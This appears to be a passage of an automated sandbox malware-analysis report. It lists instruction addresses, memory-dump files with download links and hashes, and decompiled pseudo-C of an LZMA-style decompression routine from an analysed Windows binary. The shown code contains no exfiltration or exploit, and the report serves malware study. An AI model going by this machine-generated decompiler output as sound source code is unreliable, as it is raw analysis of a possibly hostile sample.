                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fd9
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406fe2
                                                              0x00406fe2
                                                              0x00406fe6
                                                              0x00407195
                                                              0x00000000
                                                              0x00407195
                                                              0x00406ff2
                                                              0x00406ff9
                                                              0x00407001
                                                              0x00407001
                                                              0x00407001
                                                              0x00407004
                                                              0x00407007
                                                              0x00407007
                                                              0x00000000
                                                              0x00000000
                                                              0x00406925
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040699b
                                                              0x0040699e
                                                              0x004069a1
                                                              0x004069a8
                                                              0x004069b2
                                                              0x00000000
                                                              0x004069b2
                                                              0x0040692c
                                                              0x00406930
                                                              0x00406933
                                                              0x00406935
                                                              0x00406938
                                                              0x0040693b
                                                              0x0040693d
                                                              0x00406940
                                                              0x00406942
                                                              0x00406947
                                                              0x0040694a
                                                              0x0040694d
                                                              0x00406951
                                                              0x00406958
                                                              0x0040695b
                                                              0x00406962
                                                              0x00406966
                                                              0x0040696e
                                                              0x0040696e
                                                              0x0040696e
                                                              0x00406968
                                                              0x00406968
                                                              0x00406968
                                                              0x0040695d
                                                              0x0040695d
                                                              0x0040695d
                                                              0x00406972
                                                              0x00406975
                                                              0x00406993
                                                              0x00406995
                                                              0x00000000
                                                              0x00406995
                                                              0x00406977
                                                              0x0040697a
                                                              0x0040697d
                                                              0x00406980
                                                              0x00406982
                                                              0x00406982
                                                              0x00406982
                                                              0x00406985
                                                              0x00406988
                                                              0x0040698a
                                                              0x0040698b
                                                              0x0040698e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bc4
                                                              0x00406bc8
                                                              0x00406be6
                                                              0x00406be9
                                                              0x00406bf0
                                                              0x00406bf3
                                                              0x00406bf6
                                                              0x00406bf9
                                                              0x00406bfc
                                                              0x00406bff
                                                              0x00406c01
                                                              0x00406c08
                                                              0x00406c09
                                                              0x00406c0b
                                                              0x00406c0e
                                                              0x00406c11
                                                              0x00406c14
                                                              0x00406c14
                                                              0x00406c19
                                                              0x00000000
                                                              0x00406c19
                                                              0x00406bca
                                                              0x00406bcd
                                                              0x00406bd0
                                                              0x00406bda
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c2e
                                                              0x00406c32
                                                              0x00406c55
                                                              0x00406c58
                                                              0x00406c5b
                                                              0x00406c65
                                                              0x00406c34
                                                              0x00406c34
                                                              0x00406c37
                                                              0x00406c3a
                                                              0x00406c3d
                                                              0x00406c4a
                                                              0x00406c4d
                                                              0x00406c4d
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c71
                                                              0x00406c75
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c7b
                                                              0x00406c7f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c85
                                                              0x00406c87
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8e
                                                              0x00406c92
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ce2
                                                              0x00406ce6
                                                              0x00406ced
                                                              0x00406cf0
                                                              0x00406cf3
                                                              0x00406cfd
                                                              0x00000000
                                                              0x00406cfd
                                                              0x00406ce8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d09
                                                              0x00406d0d
                                                              0x00406d14
                                                              0x00406d17
                                                              0x00406d1a
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d1d
                                                              0x00406d20
                                                              0x00406d23
                                                              0x00406d23
                                                              0x00406d26
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d36
                                                              0x00406d3b
                                                              0x00000000
                                                              0x00000000
                                                              0x00406dc9
                                                              0x00406dc9
                                                              0x00406dcd
                                                              0x0040716b
                                                              0x00000000
                                                              0x0040716b
                                                              0x00406dd3
                                                              0x00406dd6
                                                              0x00406dd9
                                                              0x00406ddd
                                                              0x00406de0
                                                              0x00406de6
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406deb
                                                              0x00406dee
                                                              0x00000000
                                                              0x00000000
                                                              0x004069be
                                                              0x004069be
                                                              0x004069c2
                                                              0x0040712f
                                                              0x00000000
                                                              0x0040712f
                                                              0x004069c8
                                                              0x004069cb
                                                              0x004069ce
                                                              0x004069d2
                                                              0x004069d5
                                                              0x004069db
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069dd
                                                              0x004069e0
                                                              0x004069e3
                                                              0x004069e3
                                                              0x004069e6
                                                              0x004069e9
                                                              0x00000000
                                                              0x00000000
                                                              0x004069ef
                                                              0x004069f5
                                                              0x00000000
                                                              0x00000000
                                                              0x004069fb
                                                              0x004069fb
                                                              0x004069ff
                                                              0x00406a02
                                                              0x00406a05
                                                              0x00406a08
                                                              0x00406a0b
                                                              0x00406a0c
                                                              0x00406a0f
                                                              0x00406a11
                                                              0x00406a17
                                                              0x00406a1a
                                                              0x00406a1d
                                                              0x00406a20
                                                              0x00406a23
                                                              0x00406a26
                                                              0x00406a29
                                                              0x00406a45
                                                              0x00406a48
                                                              0x00406a4b
                                                              0x00406a4e
                                                              0x00406a55
                                                              0x00406a59
                                                              0x00406a5b
                                                              0x00406a5f
                                                              0x00406a2b
                                                              0x00406a2b
                                                              0x00406a2f
                                                              0x00406a37
                                                              0x00406a3c
                                                              0x00406a3e
                                                              0x00406a40
                                                              0x00406a40
                                                              0x00406a62
                                                              0x00406a69
                                                              0x00406a6c
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a72
                                                              0x00000000
                                                              0x00406a77
                                                              0x00406a77
                                                              0x00406a7b
                                                              0x0040713b
                                                              0x00000000
                                                              0x0040713b
                                                              0x00406a81
                                                              0x00406a84
                                                              0x00406a87
                                                              0x00406a8b
                                                              0x00406a8e
                                                              0x00406a94
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a96
                                                              0x00406a99
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406a9c
                                                              0x00406aa2
                                                              0x00000000
                                                              0x00000000
                                                              0x00406aa4
                                                              0x00406aa7
                                                              0x00406aaa
                                                              0x00406aad
                                                              0x00406ab0
                                                              0x00406ab3
                                                              0x00406ab6
                                                              0x00406ab9
                                                              0x00406abc
                                                              0x00406abf
                                                              0x00406ac2
                                                              0x00406ada
                                                              0x00406add
                                                              0x00406ae0
                                                              0x00406ae3
                                                              0x00406ae3
                                                              0x00406ae6
                                                              0x00406aea
                                                              0x00406aec
                                                              0x00406ac4
                                                              0x00406ac4
                                                              0x00406acc
                                                              0x00406ad1
                                                              0x00406ad3
                                                              0x00406ad5
                                                              0x00406ad5
                                                              0x00406aef
                                                              0x00406af6
                                                              0x00406af9
                                                              0x00000000
                                                              0x00406afb
                                                              0x00000000
                                                              0x00406afb
                                                              0x00406af9
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00406b00
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b3b
                                                              0x00406b3b
                                                              0x00406b3f
                                                              0x00407147
                                                              0x00000000
                                                              0x00407147
                                                              0x00406b45
                                                              0x00406b48
                                                              0x00406b4b
                                                              0x00406b4f
                                                              0x00406b52
                                                              0x00406b58
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5a
                                                              0x00406b5d
                                                              0x00406b60
                                                              0x00406b60
                                                              0x00406b66
                                                              0x00406b04
                                                              0x00406b04
                                                              0x00406b07
                                                              0x00000000
                                                              0x00406b07
                                                              0x00406b68
                                                              0x00406b68
                                                              0x00406b6b
                                                              0x00406b6e
                                                              0x00406b71
                                                              0x00406b74
                                                              0x00406b77
                                                              0x00406b7a
                                                              0x00406b7d
                                                              0x00406b80
                                                              0x00406b83
                                                              0x00406b86
                                                              0x00406b9e
                                                              0x00406ba1
                                                              0x00406ba4
                                                              0x00406ba7
                                                              0x00406ba7
                                                              0x00406baa
                                                              0x00406bae
                                                              0x00406bb0
                                                              0x00406b88
                                                              0x00406b88
                                                              0x00406b90
                                                              0x00406b95
                                                              0x00406b97
                                                              0x00406b99
                                                              0x00406b99
                                                              0x00406bb3
                                                              0x00406bba
                                                              0x00406bbd
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406bbf
                                                              0x00000000
                                                              0x00406e4c
                                                              0x00406e4c
                                                              0x00406e50
                                                              0x00407177
                                                              0x00000000
                                                              0x00407177
                                                              0x00406e56
                                                              0x00406e59
                                                              0x00406e5c
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e69
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6b
                                                              0x00406e6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c1c
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f5b
                                                              0x00406f5f
                                                              0x00406f81
                                                              0x00406f84
                                                              0x00406f8e
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f61
                                                              0x00406f64
                                                              0x00406f68
                                                              0x00406f6b
                                                              0x00406f6b
                                                              0x00406f6e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407018
                                                              0x0040701c
                                                              0x0040703a
                                                              0x0040703a
                                                              0x0040703a
                                                              0x00407041
                                                              0x00407048
                                                              0x0040704f
                                                              0x0040704f
                                                              0x00000000
                                                              0x0040704f
                                                              0x0040701e
                                                              0x00407021
                                                              0x00407024
                                                              0x00407027
                                                              0x0040702e
                                                              0x00406f72
                                                              0x00406f72
                                                              0x00406f75
                                                              0x00000000
                                                              0x00000000
                                                              0x00407109
                                                              0x0040710c
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d43
                                                              0x00406d45
                                                              0x00406d4c
                                                              0x00406d4d
                                                              0x00406d4f
                                                              0x00406d52
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5a
                                                              0x00406d5d
                                                              0x00406d60
                                                              0x00406d62
                                                              0x00406d64
                                                              0x00406d64
                                                              0x00406d65
                                                              0x00406d68
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d80
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00407060
                                                              0x00000000
                                                              0x00000000
                                                              0x00407065
                                                              0x00407065
                                                              0x00407069
                                                              0x004071a1
                                                              0x00000000
                                                              0x004071a1
                                                              0x0040706f
                                                              0x00407072
                                                              0x00407075
                                                              0x00407079
                                                              0x0040707c
                                                              0x00407082
                                                              0x00407084
                                                              0x00407084
                                                              0x00407084
                                                              0x00407087
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708a
                                                              0x0040708d
                                                              0x0040708d
                                                              0x00407091
                                                              0x004070f1
                                                              0x004070f4
                                                              0x004070f9
                                                              0x004070fa
                                                              0x004070fc
                                                              0x004070fe
                                                              0x00407101
                                                              0x0040700d
                                                              0x0040700d
                                                              0x00000000
                                                              0x0040700d
                                                              0x00407093
                                                              0x00407099
                                                              0x0040709c
                                                              0x0040709f
                                                              0x004070a2
                                                              0x004070a5
                                                              0x004070a8
                                                              0x004070ab
                                                              0x004070ae
                                                              0x004070b1
                                                              0x004070b4
                                                              0x004070cd
                                                              0x004070d0
                                                              0x004070d3
                                                              0x004070d6
                                                              0x004070da
                                                              0x004070dc
                                                              0x004070dc
                                                              0x004070dd
                                                              0x004070e0
                                                              0x004070b6
                                                              0x004070b6
                                                              0x004070be
                                                              0x004070c3
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070c8
                                                              0x004070e3
                                                              0x004070ea
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x00406d88
                                                              0x00406d8b
                                                              0x00406dc1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef1
                                                              0x00406ef4
                                                              0x00406ef4
                                                              0x00406ef7
                                                              0x00406ef9
                                                              0x00407183
                                                              0x00000000
                                                              0x00407183
                                                              0x00406eff
                                                              0x00406f02
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f08
                                                              0x00406f0c
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00000000
                                                              0x00406f0f
                                                              0x00406d8d
                                                              0x00406d8f
                                                              0x00406d91
                                                              0x00406d93
                                                              0x00406d96
                                                              0x00406d97
                                                              0x00406d99
                                                              0x00406d9b
                                                              0x00406d9e
                                                              0x00406da1
                                                              0x00406db7
                                                              0x00406dbc
                                                              0x00406df4
                                                              0x00406df4
                                                              0x00406df8
                                                              0x00406e24
                                                              0x00406e26
                                                              0x00406e2d
                                                              0x00406e30
                                                              0x00406e33
                                                              0x00406e33
                                                              0x00406e38
                                                              0x00406e38
                                                              0x00406e3a
                                                              0x00406e3d
                                                              0x00406e44
                                                              0x00406e47
                                                              0x00406e74
                                                              0x00406e74
                                                              0x00406e77
                                                              0x00406e7a
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00000000
                                                              0x00406eee
                                                              0x00406e7c
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8b
                                                              0x00406e8e
                                                              0x00406e91
                                                              0x00406e94
                                                              0x00406e97
                                                              0x00406e9a
                                                              0x00406e9d
                                                              0x00406eb6
                                                              0x00406eb8
                                                              0x00406ebb
                                                              0x00406ebc
                                                              0x00406ebf
                                                              0x00406ec1
                                                              0x00406ec4
                                                              0x00406ec6
                                                              0x00406ec8
                                                              0x00406ecb
                                                              0x00406ecd
                                                              0x00406ed0
                                                              0x00406ed4
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed7
                                                              0x00406eda
                                                              0x00406edd
                                                              0x00406e9f
                                                              0x00406e9f
                                                              0x00406ea7
                                                              0x00406eac
                                                              0x00406eae
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406ee0
                                                              0x00406ee7
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee7
                                                              0x00406dfa
                                                              0x00406dfd
                                                              0x00406dff
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0a
                                                              0x00406e0d
                                                              0x00406e10
                                                              0x00406e10
                                                              0x00406e13
                                                              0x00406e13
                                                              0x00406e16
                                                              0x00406e1d
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1d
                                                              0x00406da3
                                                              0x00406da6
                                                              0x00406da8
                                                              0x00406dab
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b0a
                                                              0x00406b0a
                                                              0x00406b0e
                                                              0x00407153
                                                              0x00000000
                                                              0x00407153
                                                              0x00406b14
                                                              0x00406b17
                                                              0x00406b1a
                                                              0x00406b1d
                                                              0x00406b20
                                                              0x00406b23
                                                              0x00406b26
                                                              0x00406b28
                                                              0x00406b2b
                                                              0x00406b2e
                                                              0x00406b31
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c95
                                                              0x00406c95
                                                              0x00406c99
                                                              0x0040715f
                                                              0x00000000
                                                              0x0040715f
                                                              0x00406c9f
                                                              0x00406ca2
                                                              0x00406ca5
                                                              0x00406ca8
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406cad
                                                              0x00406cb0
                                                              0x00406cb3
                                                              0x00406cb6
                                                              0x00406cb9
                                                              0x00406cbc
                                                              0x00406cbd
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cc2
                                                              0x00406cc5
                                                              0x00406cc8
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406cce
                                                              0x00406cd0
                                                              0x00406cd0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f16
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f1c
                                                              0x00406f1f
                                                              0x00406f22
                                                              0x00406f25
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f2a
                                                              0x00406f2d
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406f36
                                                              0x00406f39
                                                              0x00406f3a
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3f
                                                              0x00406f42
                                                              0x00406f45
                                                              0x00406f48
                                                              0x00406f4b
                                                              0x00406f4f
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00000000
                                                              0x00406f56
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x00000000
                                                              0x00406cd3
                                                              0x00406f54
                                                              0x00407189
                                                              0x004071ab
                                                              0x004071b1
                                                              0x004071b3
                                                              0x004071ba
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x004071c0
                                                              0x004071c0
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                                              • Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
                                                              • Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                                              • Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406BC4, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406BC4() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
